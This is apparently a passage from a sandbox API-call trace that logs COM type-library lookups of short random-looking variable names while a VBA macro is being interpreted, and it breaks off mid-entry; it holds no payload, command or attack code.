MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b824ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zX1A1D") returned 7 [0069.865] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zX1A1D", lHashVal=0x104c88, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b824ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zX1A1D") returned 7 [0069.865] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zX1A1D", lHashVal=0x104c88, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zX1A1D") returned 0x104c88 [0069.865] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zX1A1D" | out: _Dst="zX1A1D") returned 0x0 [0069.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zX1A1D") returned 7 [0069.865] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.865] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zX1A1D", lHashVal=0x104c88, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.865] IUnknown:Release (This=0x665ba50) returned 0xd [0069.865] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.865] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zX1A1D", lHashVal=0x104c88, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.865] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.865] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.865] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zX1A1D", lHashVal=0x104c88, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.865] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.865] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.865] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zX1A1D", lHashVal=0x104c88, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.865] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b824ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zX1A1D") returned 7 [0069.866] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zX1A1D", lHashVal=0x104c88, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.866] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.866] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b824ba | out: _Dst=0x68767a0) returned 0x0 [0069.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zX1A1D") returned 0x10c731 [0069.866] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zX1A1D" | out: _Dst="_B_var_zX1A1D") returned 0x0 [0069.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zX1A1D") returned 14 [0069.866] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.866] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zX1A1D", lHashVal=0x10c731, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.866] IUnknown:Release (This=0x665ba50) returned 0xd [0069.866] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.866] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zX1A1D", lHashVal=0x10c731, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.866] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.866] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.866] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zX1A1D", lHashVal=0x10c731, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.866] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.866] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.866] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zX1A1D", lHashVal=0x10c731, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.866] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.866] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.866] IUnknown:Release (This=0x665ba50) returned 0xd [0069.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871a5e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zX1A1D") returned 14 [0069.866] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zX1A1D", lHashVal=0x10c731, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0069.866] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b824ba | out: _Dst=0x144ec0) returned 0x0 [0069.866] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WQXBAAUk", lHashVal=0x10ef78, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b825ae, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQXBAAUk") returned 9 [0069.867] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WQXBAAUk", lHashVal=0x10ef78, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b825ae, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQXBAAUk") returned 9 [0069.867] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WQXBAAUk", lHashVal=0x10ef78, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WQXBAAUk") returned 0x10ef78 [0069.867] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="WQXBAAUk" | out: _Dst="WQXBAAUk") returned 0x0 [0069.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="WQXBAAUk") returned 9 [0069.867] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.867] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WQXBAAUk", lHashVal=0x10ef78, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.867] IUnknown:Release (This=0x665ba50) returned 0xd [0069.867] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.867] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WQXBAAUk", lHashVal=0x10ef78, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.867] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.867] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.867] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WQXBAAUk", lHashVal=0x10ef78, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.867] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.867] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.867] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WQXBAAUk", lHashVal=0x10ef78, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.867] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b825ae, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQXBAAUk") returned 9 [0069.867] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WQXBAAUk", lHashVal=0x10ef78, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.867] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.867] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b825ae | out: _Dst=0x68767a0) returned 0x0 [0069.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WQXBAAUk") returned 0x10c701 [0069.868] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_WQXBAAUk" | out: _Dst="_B_var_WQXBAAUk") returned 0x0 [0069.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_WQXBAAUk") returned 16 [0069.868] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.868] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WQXBAAUk", lHashVal=0x10c701, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.868] IUnknown:Release (This=0x665ba50) returned 0xd [0069.868] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.868] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WQXBAAUk", lHashVal=0x10c701, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.868] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.868] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.868] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WQXBAAUk", lHashVal=0x10c701, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.868] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.868] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.868] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WQXBAAUk", lHashVal=0x10c701, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.868] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.868] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.868] IUnknown:Release (This=0x665ba50) returned 0xd [0069.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871a8e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_WQXBAAUk") returned 16 [0069.868] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WQXBAAUk", lHashVal=0x10c701, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0) returned 0x0 [0069.868] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b825ae | out: _Dst=0x144ec0) returned 0x0 [0069.868] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wDQZ4Q", lHashVal=0x10c746, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82586, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wDQZ4Q") returned 7 [0069.868] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wDQZ4Q", lHashVal=0x10c746, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82586, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wDQZ4Q") returned 7 [0069.868] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wDQZ4Q", lHashVal=0x10c746, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wDQZ4Q") returned 0x10c746 [0069.869] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="wDQZ4Q" | out: _Dst="wDQZ4Q") returned 0x0 [0069.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="wDQZ4Q") returned 7 [0069.869] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.869] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wDQZ4Q", lHashVal=0x10c746, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.869] IUnknown:Release (This=0x665ba50) returned 0xd [0069.869] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.869] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wDQZ4Q", lHashVal=0x10c746, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.869] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.869] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.869] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wDQZ4Q", lHashVal=0x10c746, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.869] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.869] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.869] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wDQZ4Q", lHashVal=0x10c746, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.869] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82586, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wDQZ4Q") returned 7 [0069.869] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wDQZ4Q", lHashVal=0x10c746, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.869] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.869] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82586 | out: _Dst=0x68767a0) returned 0x0 [0069.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wDQZ4Q") returned 0x1041b0 [0069.869] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_wDQZ4Q" | out: _Dst="_B_var_wDQZ4Q") returned 0x0 [0069.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_wDQZ4Q") returned 14 [0069.869] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.869] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wDQZ4Q", lHashVal=0x1041b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.869] IUnknown:Release (This=0x665ba50) returned 0xd [0069.869] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.869] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wDQZ4Q", lHashVal=0x1041b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.869] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.869] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.870] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wDQZ4Q", lHashVal=0x1041b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.870] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.870] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.870] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wDQZ4Q", lHashVal=0x1041b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.870] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.870] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.870] IUnknown:Release (This=0x665ba50) returned 0xd [0069.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871abe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_wDQZ4Q") returned 14 [0069.870] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wDQZ4Q", lHashVal=0x1041b0, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x34005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x34005a00000000, pDummy=0x0) returned 0x0 [0069.870] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82586 | out: _Dst=0x144ec0) returned 0x0 [0069.870] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wZAGZGD", lHashVal=0x1006fd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b825da, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wZAGZGD") returned 8 [0069.870] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wZAGZGD", lHashVal=0x1006fd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b825da, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wZAGZGD") returned 8 [0069.870] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wZAGZGD", lHashVal=0x1006fd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wZAGZGD") returned 0x1006fd [0069.870] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="wZAGZGD" | out: _Dst="wZAGZGD") returned 0x0 [0069.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="wZAGZGD") returned 8 [0069.870] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.870] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wZAGZGD", lHashVal=0x1006fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.870] IUnknown:Release (This=0x665ba50) returned 0xd [0069.870] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.870] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wZAGZGD", lHashVal=0x1006fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.870] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.870] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.871] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wZAGZGD", lHashVal=0x1006fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.871] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.871] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.871] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wZAGZGD", lHashVal=0x1006fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.871] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b825da, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wZAGZGD") returned 8 [0069.871] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wZAGZGD", lHashVal=0x1006fd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.871] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.871] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b825da | out: _Dst=0x68767a0) returned 0x0 [0069.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wZAGZGD") returned 0x10fb3f [0069.871] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_wZAGZGD" | out: _Dst="_B_var_wZAGZGD") returned 0x0 [0069.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_wZAGZGD") returned 15 [0069.871] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.871] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wZAGZGD", lHashVal=0x10fb3f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.871] IUnknown:Release (This=0x665ba50) returned 0xd [0069.871] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.871] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wZAGZGD", lHashVal=0x10fb3f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.871] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.871] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.871] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wZAGZGD", lHashVal=0x10fb3f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.871] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.871] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.871] ITypeLib:RemoteIsName (in: This=0x665b4b0, 